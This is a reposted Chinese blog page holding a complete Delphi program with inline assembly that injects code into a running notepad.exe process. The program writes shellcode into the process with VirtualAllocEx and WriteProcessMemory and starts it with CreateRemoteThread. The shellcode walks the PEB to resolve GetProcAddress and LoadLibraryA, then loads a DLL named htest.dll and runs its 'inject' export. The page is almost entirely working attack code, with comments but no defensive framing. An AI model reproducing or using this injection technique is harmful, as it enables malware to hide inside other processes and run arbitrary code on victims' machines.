本文整理自网络,侵删。
program ProcessInject;
uses
SysUtils,
windows,
classes,
TLHelp32;
var
size:integer;
phandle:thandle;
bytes,pid,tid:dword;
newmodule:pointer;
ContinueLoop:BOOL;
FSnapshotHandle:THandle;
FProcessEntry32:TProcessEntry32;
procedure mainproc; //注入程序体
label search;
begin
asm
{获取kernel32.dll基址}
push ebp
push esi //保留现场
sub esp,$00000064 //分配了100个字节的局部变量空间
mov ebp,esp
push ebp
mov eax,fs:$30 //得到PEB结构地址
mov eax,[eax+$0c] //得到PEB_LDR_DATA结构地址
mov esi,[eax+$1c]
lodsd //得到KERNEL32.DLL所在LDR_MODULE结构的InInitializationOrderModuleList地址
mov eax,[eax+$08] //得到BaseAddress,即Kernel32.dll基址
{获取GetProcAddress函数地址}
mov ebp,eax //kernel32基址
mov eax,[ebp+$3c] //eax=pe首部
mov edx,[ebp+eax+$78]
add edx,ebp
mov ecx,[edx+$18]
mov ebx,[edx+$20]
add ebx,ebp //ebx=AddressOfName
search:
dec ecx
mov esi,[ebx+ecx*4]
add esi,ebp
mov eax,$50746547 //ASCII 'PteG'
cmp [esi],eax //比较
jne search //不等则跳
mov eax,$41636f72 //ASCII 'Acor'
cmp [esi+4],eax
jne search
mov ebx,[edx+$1c] //找到
add ebx,ebp
mov eax,[ebx+ecx*4]
add eax,ebp
mov ecx,ebp //ecx = Kernel32基址
pop ebp
mov [ebp+14],eax //记录 GetProcAddress 地址到 ebp+14
mov [ebp+10],ecx //记录kernel32基址到 ebp+10
{通过GetProcAddress函数寻找其它函数地址}
push $0
push $41797261
push $7262694c
push $64616f4c //ASCII 'LoadLibraryA'
push esp //压入字符串地址
push [ebp+10] //压入Kernel32.dll基址
call [ebp+14] //执行 GetProcAddress
mov [ebp+18],eax //保存 LoadLibraryA 函数 到 ebp+18
push $0000006c
push $6c642e74
push $73657468 //ASCII 'htest.dll'
push esp
call [ebp+18]
push $00007463
push $656a6e69 //ASCII 'inject'
push esp //压入字符串地址
push eax //压入htest.dll基址
call [ebp+14]
call eax //执行程序体
{还原现场,平衡堆栈}
mov esp,ebp
add esp,$00000064
pop esi
pop ebp
end;
end;
procedure procend; //过程结尾
begin
end;
begin
//枚举进程
pid:=0;
FSnapshotHandle:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
FProcessEntry32.dwSize:=Sizeof(FProcessEntry32);
ContinueLoop:=Process32First(FSnapshotHandle,FProcessEntry32);
while integer(ContinueLoop)<>0 do
begin
if uppercase(FProcessEntry32.szExeFile)='NOTEPAD.EXE' then
begin
pid:=fprocessentry32.th32ProcessID;
break;
end;
ContinueLoop:=Process32Next(FSnapshotHandle,FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
if integer(ContinueLoop)=0 then exit; //未找到进程
phandle:=openprocess(PROCESS_ALL_ACCESS,false,pid);
if phandle=0 then exit;
size:=dword(@procend)-dword(@mainproc)+1;
newmodule:=VirtualAllocEx(phandle,nil,size,MEM_COMMIT or MEM_RESERVE,PAGE_EXECUTE_READWRITE); //分配空间
if newmodule=nil then exit;
writeprocessmemory(phandle,newmodule,@mainproc,size,bytes); //写入代码
createremotethread(phandle,nil,0,newmodule,nil,0,tid); //建立线程
end.
相关阅读 >>
Delphi d10.x 并行库ppl编程之 futures
Delphi xe 启动关闭start page 页错误提示
Delphi格式化函数format、formatdatetime和formatfloat
更多相关阅读请进入《Delphi》频道 >>
